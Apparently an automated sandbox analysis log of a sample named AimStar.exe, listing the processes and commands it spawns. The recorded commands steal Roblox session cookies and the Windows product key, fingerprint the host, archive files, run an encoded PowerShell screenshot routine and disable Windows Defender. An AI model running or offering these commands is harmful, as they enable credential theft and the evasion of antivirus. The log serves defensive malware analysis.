              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,88_2_00007FF71399B340
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F695E0 cpuid 0_2_00007FF710F695E0
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes VolumeInformationJump to behavior
